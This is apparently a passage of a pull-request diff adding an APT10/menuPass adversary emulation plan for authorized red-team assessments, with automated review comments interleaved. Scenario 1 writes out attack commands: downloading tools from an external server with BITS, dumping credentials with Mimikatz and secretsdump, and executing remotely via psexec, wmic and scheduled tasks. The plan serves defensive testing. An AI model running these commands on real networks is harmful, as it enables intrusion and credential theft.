+The infrastructure listed below is a recommendation, not a requirement. We hope to capture the general structure of what is reported to have been seen being used by menuPass. If you have the time and resources to remain true-to-form, you may elect to stand up multiple of each of these servers, ensuring that you use different service providers, and non-contiguous IP space, etc. If you are not concerned with emulating menuPass to this degree, this level of effort is not necessary. You could for instance, phish, serve payload, and exfil from/to the same server. The following represents a bare minimum but should be operationally representative of menuPass infrastructure and toolset:
+
+* Redirectors
+ * menuPass actors are thought to have used redirectors to proxy C2 traffic. To remain operationally representative, you may consider establishing redirectors to relay your traffic with any of the available cloud service providers. If you wish to maintain C2 over HTTPS, consider [Let's Encrypt](https://letsencrypt.org) for free SSL/TLS certificates.
+
+* Phishing Servers (Optional)
+ * Aside from exploiting trust relationships, menuPass is widely reported to have phished for initial access. There are, a few ways to approach phishing. The most resource intensive would be to stand up a phishing server. This is not necessary to remain operationally representative but is mentioned to those interested in assessing their organization's ability to protect, detect, and defend to phishing.
+
+* Payload Servers
+ * In some instances, menuPass actors are reported to have used download cradles to fetch and execute payloads. These download cradles request the payload from a payload server, whose purpose is simply...to serve payloads. If you are concerned with maintaining distributed infrastructure, you may elect to set up a sever dedicated to this purpose.
+
+* Exfiltration Servers
+ * menuPass actors have been observed staging, compressing, and exfiltrating data from target networks. Data is commonly reported to have been "pushed" from the network. To emulate this activity, you will need to establish an exfiltration server that is capable of receiving connections from tools like PuTTY/PSCP.
+
+---
+
+## Emulation Team Infrastructure Configuration
+
+Detailing specific infrastructure configuration is beyond the scope of this plan. Please consult the following resources:
+
+* [Cloud-based Redirectors for Distributed Hacking](https://blog.cobaltstrike.com/2014/14/cloud-based-redirectors-for-distributed-hacking/)
+* [Infrastructure for Ongoing Red Team Operations](https://blog.cobaltstrike.com/2014/09/09/infrastructure-for-ongoing-red-team-operations)
+* [HTTPS Payload and C2 Redirectors](https://bluescreenofjeff.com/2018-04-12-https-payload-and-c2-redirectors/)
+* [Red Team Infrastructure Wiki](https://github.com/bluscreenofjeff/Red-Team-Infrastructure-Wiki)
+* [A Deep Dive into Cobalt Strike Malleable C2](https://posts.specterops.io/a-deep-dive-into-cobalt-strike-malleable-c2-6660e33b0e0b)
+
+---
+
+## Emulation Team Systems and Tools
+
+The tools listed hereafter are reported to have been used by menuPass, hence their inclusion in our plan. In most cases, the exact command-line implementation of the tool is an educated guess. These tools are recommendations, not requirements. Our intent is to encourage a defensive posture that is informed by TTPs, not by tools. Please feel free to use whatever toolset best suits your use case.
+
+ * C2 Framework
+ * [Koadic](https://github.com/zerosum0x0/koadic)
+ * Implants
+ * [Quasar](https://github.com/quasar/Quasar)
+ * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit)
+ * [Wmiexec](https://github.com/Twi1ight/AD-Pentest-Script/blob/master/wmiexec.vbs)
+ * Impacket
+ * [Secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)
+ * [Atexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/atexec.py)
+ * [Psexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py)
+ * [PyInstaller](https://pyinstaller.org)
+ * Impacket Binaries - alternative to compiling the above python scripts with PyInstaller
+ * [Compiled](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.22.dev-binaries)
+ * [Nbtscan](https://unixwiz.net/tools/nbtscan.html)
+ * [Netsess](https://joeware.net/freetools/tools/netsess)
+ * [Mimikatz](https://github.com/gentilkiwi/mimikatz/releases)
+ * [Tcping](https://elifulkerson.com/projects/tcping.php)
+ * [Winrar](https://rarlab.com) (optional)
+ * [PuTTY/PSCP](https://chiark.greenend.org.uk/~sgtatham/putty/latest.html)
+ * [cURL](https://curl.haxx.se/windows)
+
+---
+
+## Target Infrastructure
+
+Much of the publicly reported menuPass activity has been directed against Windows Domains. This plan was designed accordingly. To execute this plan, you will require at a minimum, the following:
+
+* 1 Domain controller
+* 2 Workstations
+* 2 Servers
+* Multiple accounts with varying levels of privilege
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
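Review bot: several text defects in the new file should be fixed before merge: `There are, a few ways to approach phishing` (stray comma), `protect, detect, and defend to phishing` (`defend against`), `set up a sever dedicated to this purpose` (`server`), and `whose purpose is simply...to serve payloads` (drop the ellipsis). The first resource link, `+* [Cloud-based Redirectors for Distributed Hacking](https://blog.cobaltstrike.com/2014/14/cloud-based-redirectors-for-distributed-hacking/)`, has `14` where the sibling URL `.../2014/09/09/...` has a month and day, so it is almost certainly wrong; verify the URL. Style: this file's `Additional Plan Resources` uses `-` bullets while the fin6 blocks added in the same PR use `*`, and the `Emulation Team Systems and Tools` list is indented one level deeper than the other lists in the file, which will render as a nested list under nothing; align both with the fin6 files.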
diff --git a/menuPass/Emulation_Plan/OpFlow_Diagram.png b/menuPass/Emulation_Plan/OpFlow_Diagram.png
new file mode 100644
index 00000000..5dea81b6
Binary files /dev/null and b/menuPass/Emulation_Plan/OpFlow_Diagram.png differ
diff --git a/menuPass/Emulation_Plan/README.md b/menuPass/Emulation_Plan/README.md
new file mode 100644
index 00000000..5b261a0c
--- /dev/null
+++ b/menuPass/Emulation_Plan/README.md
@@ -0,0 +1,43 @@
+# menuPass Adversary Emulation
+
+menuPass is thought to be motivated by collection objectives that align with Chinese national interests. The group's targeting is consistent with China's strategic objectives as stated in the Five-Year Plan (FYP) / Made in China 2025 Plan. While most of the group's targets have been located in the United States and Japan, the group has also been linked to intrusions in at least 12 other countries.
+
+The Intelligence Summary summarizes 32 publicly available sources to describe menuPass, their motivations, objectives, and observed target industries. It further describes the typical menuPass Operational Flow along with their publicly attributed Tactics, Techniques, and Procedures (TTPs) mapped to ATT&CK. In reviewing the plan, you may notice TTPs that do not currently map to the ATT&CK framework's menuPass group profile. This information has been provided to the ATT&CK team for analysis and potential incorporation.
+
+The Operations Flow chains techniques together into a logical flow of the major Steps that commonly occur across menuPass operations. At a macro level, the publicly available reporting attributed to menuPass can be organized into two categories. One being reporting specific to menuPass activities directed against MSP subscriber networks. The other being activity that generally was initiated by spearphishing and leveraged a command-and-control framework to achieve operational objectives. Thus, we have organized the menuPass emulation plan into two scenarios.
+
+- Scenario 1: This scenario is designed to emulate activity attributed to menuPass that is specific to the group's efforts targeting MSP subscriber networks. The intent of this scenario is to assess your organization's ability to protect, detect, and defend execution, tool ingress, discovery, credential access, lateral movement, persistence, collection, and exfiltration.
+- Scenario 2: This scenario is designed to emulate activity attributed to menuPass that entails the pursuit of operational objectives using a command-and-control framework. This scenario is intended to assess your organization's ability to protect, detect, and defend execution, discovery, privilege escalation, credential access, lateral movement, exfiltration, C2, and persistence using a command-and-control framework.
+
+The menuPass emulation plan is a human-readable, step-by-step / command-by-command implementation of menuPass TTPs. Structurally, the plan is organized into 2 scenarios, as defined in the Operations Flow. The human-readable plan is accompanied by a machine-readable plan implemented in YAML. The YAML includes all steps, commands, and syntax for Scenario 1. The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent in the human-readable version.
+
+## Table of Contents
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
+
+## Liability / Responsible Usage
+
+This content is only to be used with appropriate prior, explicit authorization for the purposes of assessing security posture and/or research.
+
+## Notice
+
+Copyright 2021 MITRE Engenuity. Approved for public release. Document number CT0012.
+
+Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at
+
+[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
+
+Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.
+
+This project makes use of ATT&CK®
+
+[ATT&CK Terms of Use](https://attack.mitre.org/resources/terms-of-use/)
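Review bot: the final paragraph of the overview says the YAML "includes all steps, commands, and syntax for Scenario 1" right after stating that the plan is organized into two scenarios, so state explicitly that Scenario 2 has no machine-readable counterpart yet (and link the issue tracking it, if one exists); otherwise readers of the YAML directory will assume it is incomplete. The same paragraph's "The YAML template was nuanced to ensure that each step within the YAML is directly coupled with its equivalent" should read something like "The YAML was structured so that each step maps one-to-one to its equivalent in the human-readable plan". Minor: "organized into 2 scenarios" should spell out "two" as the rest of the text does, and the Table of Contents' Emulation Plan entry links to this README itself.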
diff --git a/menuPass/Emulation_Plan/ResourceDevelopment.md b/menuPass/Emulation_Plan/ResourceDevelopment.md
new file mode 100644
index 00000000..2c6c7e2c
--- /dev/null
+++ b/menuPass/Emulation_Plan/ResourceDevelopment.md
@@ -0,0 +1,54 @@
+# Reconnaissance and Resource Development Overview
+
+* Emulating reconnaissance and resource development such as information gathering, capability development, and weaponization.
+* This step is not necessary to remain operationally representative but should be considered if you intend to attain initial access via phishing.
+
+## Contents
+
+ * [Step 1 - Information Gathering](#step-1---information-gathering)
+ * [Step 2 - Building Capabilities](#step-2---building-capabilities)
+ * [Step 3 - Weaponization](#step-3---weaponization)
+ * [Step 4 - Establish and Maintain Infrastructure](#step-2---establish-and-maintain-infrastructure)
+
+---
+
+# Reconnaissance
+
+## Step 1 - Information Gathering
+It is difficult to determine precisely how menuPass prepares for an operation. We can however, assume that menuPass actors, after carefully selecting a target, perform some degree of technical, social, and organizational information gathering.[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) This may also be the stage where menuPass actors acquire publicly available documents from the organization they intend to target, for later weaponization.[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) They use the information from these efforts to identify individuals to be targeted and develop pretexts to be used in social engineering (phishing) attacks.[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) If you intend to phish, this is the time to identify targets, develop pretext, and collect documents for weaponization.
+
+# Resource Development
+
+## Step 2 - Develop Capabilities
+menuPass is reported to have used both custom and publicly available tools. This is the appropriate time to identify the C2 framework you will be using, select exploits (if you intend to use them), generate payloads, compile and rename tools. menuPass is reported to have made use of several tools from the Impacket Suite.[7]((https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)) Tools like atexec.py, secretsdump.py, and psexec.py should be compiled into executables using a python compiler. You may also elect to use the compiled binaries [here](https://github.com/ropnop/impacket_static_binaries/releases/tag/0.9.22.dev-binaries).
+
+## Step 3 - Weaponization
+menuPass is reported to have weaponized documents discovered during information gathering that were perceived to have been of interest to the intended target. These documents would be weaponized with either an exploit or a macro that would inject tactical malware such as ChChes, EvilGrab, or Koadic. The purpose of using a tactical implant during delivery is to mimimize the risk to, and later correlation with, the strategically emplaced sustained implants used for persistence at a later stage in the operation. menuPass is widely reported to have weaponized these email messages in one of four ways:
+
+1. Macro
+2. .lnk file
+3. Exploit
+4. Masquerading
+
+menuPass actors are widely reported to have weaponized password protected MS Word/Excel documents with embedded VBA macros.[9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html) After authenticating, the intended recipient will be prompted to "enable content/macros." If enabled, the macro typically dropped files to a temp folder, decoded, executed, and deleted them. This execution resulted in DLL sideloading and the subsequent establishment of C2 on the infected host.[8](https://www.accenture.com/t20180423T055005Z_s_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf) [9](https://fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html)
+
+menuPass is also reported to have attached zip files that contained .lnk files. When executed, the .lnk file would invoke the command prompt and use PowerShell to download and execute another PowerShell script.[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) This script was responsible for situating a tactical implant in memory.[4](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [11](https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/) [20](https://lac.co.jp/lacwatch/people/20170223_001224.html) [24](https://trendmicro/en_us/research/17/e/rising-trend-attackers-using-lnk-files-download-malware.html)
+
+menuPass may have weaponized documents with exploits that targeted vulnerabilities in Microsoft products.[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/) [16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html) These exploits were responsible for achieving arbitrary code execution and subsequently downloading and situating a tactical implant like Koadic into memory.[15](http://blog.trendmicro.com/trendlabs-security-intelligence/chessmasters-new-strategy-evolving-tools-tactics/) [16](https://trendmicro.com/en_us/research/18/c/chessmaster-adds-updated-tools-to-its-arsenal.html)
+
+The final method of observed weaponization is masquerading. menuPass is reported to have attached digitally signed versions of ChChess and other tactical implants to email messages and modified the icon of the attachment to reflect that of a Microsoft Word document.[1](https://unit42.paloaltonetworks.com/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/)
+
+---
+
+## Additional Plan Resources
+
+- [Intelligence Summary](/menuPass/Intelligence_Summary.md)
+- [Operations Flow](/menuPass/Operations_Flow.md)
+- [Emulation Plan](/menuPass/Emulation_Plan/README.md)
+ - [Resource Development](/menuPass/Emulation_Plan/ResourceDevelopment.md)
+ - [Infrastructure](/menuPass/Emulation_Plan/Infrastructure.md)
+ - [Scenario 1](/menuPass/Emulation_Plan/Scenario1.md)
+ - [Scenario 2](/menuPass/Emulation_Plan/Scenario2.md)
+ - [YAML](/menuPass/Emulation_Plan/yaml)
+- [Issues](https://github.com/center-for-threat-informed-defense/adversary_emulation_library/issues)
+- [Change Log](/menuPass/CHANGE_LOG.md)
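Review bot: the Contents list does not match the headings that follow it: `Step 2 - Building Capabilities` links to `#step-2---building-capabilities` but the heading is `## Step 2 - Develop Capabilities`, and `Step 4 - Establish and Maintain Infrastructure` points at `#step-2---establish-and-maintain-infrastructure` while no Step 4 heading exists in this file, so rename the Step 2 entry to match the heading and either drop the Step 4 entry or point it at Infrastructure.md. Also: the citation `[7]((https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf))` in Step 2 has doubled parentheses and will render the URL inside literal brackets; the `[24](https://trendmicro/en_us/research/17/e/...)` link in Step 3 is missing the `trendmicro.com` host; "mimimize" should be "minimize"; and the implant is spelled `ChChes` in the first Step 3 paragraph but `ChChess` in the masquerading paragraph, so use one spelling (ATT&CK uses ChChes).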
diff --git a/menuPass/Emulation_Plan/Scenario1.md b/menuPass/Emulation_Plan/Scenario1.md
new file mode 100644
index 00000000..1a06f1d1
--- /dev/null
+++ b/menuPass/Emulation_Plan/Scenario1.md
@@ -0,0 +1,482 @@
+# Preface
+
+The menuPass adversary emulation plan is comprised of two scenarios. These scenarios were designed to be representative of the common corpus of publicly available reporting attributed to menuPass. Each organization can tailor this emulation to their individual use case, priorities, and available resources. Reconnaissance, resource development, and initial access considerations have been included for your consideration, and while relevant, are not necessary to remain operationally representative.
+
+Scenario 1 is designed to emulate activity attributed to menuPass that is specific to the group's efforts targeting MSP subscriber networks. Initial access could be achieved by either spearphishing or an assumed breach in which the emulation team is granted access to the environment using VPN, RDP, and elevated credentials. menuPass is widely reported to have accessed customer networks from MSP networks using elevated credentials. In pursuing an assumed breach scenario, you will be assessing the ability to protect, detect, and respond to execution, credential access, lateral movement, and exfiltration. Your goal for Scenario 1 is to access a host, upload an operational toolkit, identify systems for staging and persistence, identify systems that may contain data that would be of interest to an adversary, harvest additional credentials, move laterally to systems of interest, and ultimately exfiltrate data, real or simulated. To make the most of this scenario, consider information within your environment that would be sought after by an adversary, identify the most likely attack paths, and determine the feasibility of pursuing these attack paths.
+
+This emulation plan recommends procedures using tools reported to have been used by menuPass actors. In some instances, assumptions have been made regarding tool syntax to account for intelligence gaps. menuPass is reported to have used several different procedures to achieve similar objectives. For the purpose of this emulation plan, we have selected one example and have presented the alternatives as "Alternative Procedures."
+
+# Scenario 1 Overview
+
+* Emulating menuPass using VPN/RDP to access the environment and tools like tcping, netsess, mimikatz, psexec, and pscp to achieve tactical objectives with the operational intent of exfiltrating data.
+* Scenario 1 begins after a host is compromised/accessed and the operational toolkit is deployed.
+* The purpose of Scenario 1 is to assess your organization's ability to protect, detect, and defend tool ingress, discovery, credential harvesting, lateral movement, and exfiltration.
+
+## Prerequisites
+
+* You have either ownership of, or explicit authority and/or authorization to operate against the target network.
+* You have established your operational infrastructure.
+* You have acquired and compiled your operational toolkit
+
+## Contents
+
+* [Step 1 - Initial Access](#step-1---menupass-initial-access)
+* [Step 2 - Command and Control](#step-2---menupass-command-and-control)
+* [Step 3 - Discovery](#step-3---menupass-discovery)
+* [Step 4 - Credential Access](#step-4---menupass-credential-access)
+* [Step 5 - Lateral Movement](#step-5---menupass-lateral-movement)
+* [Step 6 - Collection](#step-6---menupass-collection)
+* [Step 7 - Exfiltration](#step-7---menupass-exfiltration)
+* [Step 8 - Execution](#step-8---menupass-execution)
+* [Step 9 - Persistence](#step-9---menupass-persistence)
+
+---
+
+## Step 1 - menuPass Initial Access
+
+### Procedures
+
+#### 1.A - Trusted Relationship ([T1199](https://attack.mitre.org/techniques/T1199/)), Valid Accounts - Domain Accounts ([T1078.002](https://attack.mitre.org/techniques/T1078/002/))
+
+menuPass is perhaps best known for what has been referred to as "Operation Cloud Hopper."[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) This activity is believed to have spanned from 2014-2018 and initially resulted in the compromise of several of the world's largest Managed Service Providers (MSP). Ultimately, these MSP's were not the final objective. menuPass would leverage its previously attained access to MSP networks to pivot into customer networks that aligned with the group's collection objectives.
+
+To do so, after gaining access to the MSP network, menuPass actors are reported to have sought out shared infrastructure. menuPass actors are thought to have initially breached customer networks by using elevated MSP or subscriber domain credentials and remote access applications.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) Emulating initial access can be as simple as providing the emulation team with a VPN/RDP connection. menuPass is reported to have initially accessed MSP subscriber networks with elevated permissions, so too should the emulation team.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)
+
+---
+
+## Step 2 - menuPass Command and Control
+
+### Procedures
+
+#### 2.A - Ingress Tool Transfer ([T1105](https://attack.mitre.org/techniques/T1105))
+
+menuPass is reported to have used BITSAdmin to transfer tools from external infrastructure to hosts in the victim's network. The tools were reported to have been dropped in C:\ProgramData\temp and C:\ProgramData\media.[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)
+
+Prior to transferring tools to the foothold, ensure they are compiled (if required) and renamed accordingly (optional). For this step, you should consider transferring secretsdump, atexec, psexec, nbtscan, netsess, tcping, nmap, winrar, pscp, and curl.
+
+```cmd
+C:\users\CVNX> powershell.exe
+PS C:\users\CVNX> Start-BitsTransfer -Source #{ } -Destination #{ }
+```
+
+Example:
+
+```cmd
+PS C:\users\CVNX> Start-BitsTransfer -Source http://123.456.7.89/TWUEGJDITXAONVPUOWFV -Destination C:\ProgramData\temp\TWUEGJDITXAONVPUOWFV
+```
+
+---
+
+## Step 3 - menuPass Discovery
+
+### Procedures
+
+#### 3.A - System Network Connections Discovery ([T1049](https://attack.mitre.org/techniques/T1049))
+
+List network connections to or from the compromised system.
+
+```cmd
+C:\users\CVNX> net use
+```
+
+#### 3.B - Remote System Discovery ([T1018](https://attack.mitre.org/techniques/T1018))
+
+Identify remote systems using net.
+
+```cmd
+C:\users\CVNX> net view /domain
+```
+
+#### 3.C - Remote System Discovery ([T1018](https://attack.mitre.org/techniques/T1018))
+
+Detect.vbs
+
+menuPass is reported to have packaged it's network reconnaissance tools in "detect.vbs." When executed, the base64 encoded file decodes itself using certutil and drops "subnet.exe" and "rund1132.exe" (tcping) to the current working directory.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) To emulate this activity, we suggest conducting remote system discovery, and using tcping to conduct network service scanning. Reporting indicates that menuPass is specifically interested in identifying the status of ports 445 and 3389 for the purpose of lateral movement.
+
+Example:
+
+```cmd
+PS C:\> Test-NetConnection 192.0.2.10
+```
+
+#### 3.D - Network Service Scanning ([T1046](https://attack.mitre.org/techniques/T1046))
+
+menuPass has used tcping, renamed to rund1132.exe, to identify and query the status of remote hosts on ports 445 and 3389.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+```cmd
+"#{tcping_local_path}"\tcping.exe "#{tcping_remote_ip}" "#{tcping_remote_port}"
+```
+
+Example:
+
+```cmd
+tcping.exe 192.0.2.10 445
+```
+
+#### 3.E - System Network Configuration Discovery ([T1016](https://attack.mitre.org/techniques/T1016))
+
+menuPass has used nbtscan (nbt.exe) to scan for nameservers.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+nbtscan
+
+```cmd
+"#{nbtscan_local_path}"\nbtscan.exe "#{nbt_ip_range}"
+```
+
+Example:
+
+```cmd
+nbtscan.exe 192.0.2.10/24
+```
+
+#### 3.F - System Network Configuration Discovery ([T1016](https://attack.mitre.org/techniques/T1016))
+
+menuPass has used netsess to enumerate NetBIOS sessions.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+NetSess
+
+```cmd
+"#{netsess_local_path}"\netsess.exe "#{netsess_remote_ip}"
+```
+
+Example:
+
+```cmd
+netsess.exe 192.0.2.10
+```
+
+---
+
+## Step 4 - menuPass Credential Access
+
+menuPass is thought to have initially accessed target environments using compromised credentials that granted elevated privileges.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) As such, privilege escalation was not necessary. menuPass is reported to have sought access to additional credentials to ensure freedom of movement throughout the domain.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf)
+
+The following procedures require elevated privileges.
+
+### Procedures
+
+#### 4.A - OS Credential Dumping: LSASS Memory ([T1003.001](https://attack.org/techniques/T1003/001)), Security Account Manager ([T1003.002](https://attack.mitre.org/techniques/T1003/002/)), LSA Secrets ([T1003.004](https://attack.mitre.org/techniques/T1003/004/))
+
+#### Mimikatz (Local)
+
+menuPass actors are reported to have used Mimikatz locally to gain access to additional credentials. In some instances, Mimikatz was reported to have been uploaded to the compromised host and used to dump credentials from memory. [10](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf) In other instances, menuPass actors are reported to have sideloaded Mimikatz with various binaries. [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) Mimikatz requires elevated privileges.
+
+```cmd
+"#{mimikatz_local_path}"\mimikatz.exe
+
+mimikatz# privilege::debug
+
+mimikatz# log gggg.log
+
+mimikatz# sekurlsa::logonpasswords
+```
+
+#### 4.B - OS Credential Dumping: Security Account Manager ([T1003.002](https://attack.mitre.org/techniques/T1003/002/)), LSA Secrets ([T1003.004](https://attack.mitre.org/techniques/T1003/004/))
+
+#### Secretsdump (Remote)
+
+Secretsdump.py of the Impacket framework was compiled to secretsdump.exe and used to dump credentials remotely.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+```cmd
+"#{secretsdump_local_path}"\secretsdump.exe #{Domain}/#{User}:#{Password}@#{Ip Address}
+```
+
+Example:
+
+```cmd
+secretsdump.exe domain/CVNX:password123!@123.456.78.9
+```
+
+---
+## Step 5 - menuPass Lateral Movement
+
+menuPass lateral movement can be interpreted as having the following steps: access, deployment, execution, control. By this point in the operation, menuPass actors are elevated, have ingressed tools, performed discovery, and harvested additional credentials to ensure freedom of movement throughout the domain. These legitimate but compromised credentials will be coupled with tools indicative of administrative funtion to either simulate exfiltration, or remotely access a host to deploy and run a lightweight implant, thereby establishing control.
+
+An example of this work-flow is in reporting that indicates menuPass actors have used harvested credentials to access the domain controller, deploy Trochilus, and ultimately copy the NTDS.dit file. The .dit file was staged, compressed and exfiltrated to attacker-controlled infrastructure.[11](https://recordedfuture.com/apt10-cyberespionage-campaign/)
+
+menuPass is reported to have accessed remote hosts via RDP, PsExec, Atexec, or mapping network shares.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://go.recordedfuture.com/hubfs/reports/cta-2019-0206.pdf) These work flows are described in the scenarios listed below. They are not, however, intended to be mutually exclusive. We suggest attempting different methods of access and execution.
+
+#### 5.A - System Services: Service Execution ([T1569.002](https://attack.mitre.org/techniques/T1569/002))
+
+menuPass appears to have used different versions of the PsExec tool to achieve the same purpose, remote code execution. Reporting indicates the attackers may have used Sysinternals PsExec and a compiled version of Impacket's psexec.py.[5](https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [12](https://us-cert.cisa.gov/ncas/alerts/TA17-117A)
+
+```cmd
+"#{psexec_local_path}"\psexec.exe "#{domain}"\"#{psexec_user}":"#{psexec_password}"@"#{psexec_remote_host}" "#{psexec_cmd}"
+```
+
+Example:
+
+```cmd
+psexec.exe domain\Administrator:badpassword123@192.0.2.10
+```
+
+#### Alternative Procedure 1: Remote Services - Remote Desktop Protocol ([T1021.001](https://attack.mitre.org/techniques/T1021/001))
+
+menuPass has used RDP to move laterally.[4](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf) [7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) RDP grants the attacker console access to a remote host. This access can be leveraged to deploy tactical malware. There are a number of ways by which the implant could be executed, but this example will detail how to do so using WMI.
+
+1. Access - Access the remote host via RDP.
+
+```cmd
+mstsc /v #{ip_address}
+```
+
+2. Deploy - Upload tactical malware to the remote host via RDP session.
+
+3. Execute - Use wmic to run the implant
+
+```cmd
+wmic /node:#{ip_address} /user:#{"user_name"} /password#{"password"} process call create #{file_to_execute}
+```
+
+#### Alternative Procedure 2: Remote Services - SMB/Windows Admin Shares ([T1021.002](https://attack.mitre.org/techniques/T1021/002)), Lateral Tool Transfer ([T1570](https://attack.mitre.org/techniques/T1570))
+
+menuPass is reported to have moved laterally by mounting a network share, copying a file to the mounted share, and creating a scheduled task via Windows Task Scheduler to run the file. After execution, the file was deleted.[10](https://recordedfuture.com/apt10-cyberespionage-campaign/)
+
+1. Access - Mount a Network Share.
+
+```cmd
+net use #{drive}: #{ip_address}\#{drive} #{password} /user:#{domain}\#{user_name}
+```
+
+
+```cmd
+Example: C:\users\CVNX> net use z: \\192.0.2.10\C$ /u:targetdomain\victim badpassword123
+```
+
+2. Check to ensure the network share is mapped:
+
+```cmd
+net use
+```
+
+3. Deploy - Copy tactical malware to the mapped network share.
+
+```cmd
+copy #{file} #{drive}\#{destination_dir}
+```
+
+```example
+
+Example: copy #{file} z:\ProgramData\Temp
+
+```
+
+4. Execute - Create a Scheduled Task to Execute the File ([T1053.005](https://attack.mitre.org/techniques/T1053/005)):[10](https://recordedfuture.com/apt10-cyberespionage-campaign/) [22](https://jpcert.or.jp/present/2018/20171109codeblue2017_en.pdf)
+
+```cmd
+schtasks /create #{task_name} /tr #{path_of_the_file_to_run} /sc #{schedule} #{user_name} /s #{ip_address}
+```
+
+```cmd
+Example: C:\Users\CVNX> schtasks /create /tn WinUpdate /tr C:\ProgramData\Temp\WinUpdate.exe /sc onstart /ru System /s 192.0.2.10
+```
+
+5. Deleting the mapped network drive:
+
+```cmd
+net use z: /delete
+```
+
+#### Alternative Procedure 3
+
+menuPass actors are reported to have used atexec.py, compiled into an executable, to manipulate a remote machine's Task Scheduler and execute commands.[7](https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf)
+
+```cmd
+#{atexec_local_path}\atexec.exe #{domain}\#{username}:#{password}@#{ip_address} #{command}
+```
+
+```cmd
+Example: atexec.exe domain\CVNX:'Password123!'@192.0.2.10 whoami
+```
+
+---
+
+## Step 6 - menuPass Collection
+
+### Procedures
+
+#### 6.A - Archive Collected Data - Archive via Utility ([T1560.001](https://attack.mitre.org/techniques/T1560/001))
+
+menuPass is thought to have renamed WinRAR to svchost.exe or r.exe, and used it to compress files prior to exfiltration. The compression tools are reported to have been run using the group's renamed version of wmiexec ("t.vbs").[7](https://pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf) [10](https://recordedfuture.com/apt10-cyberespionage-campaign/)
+
+```cmd
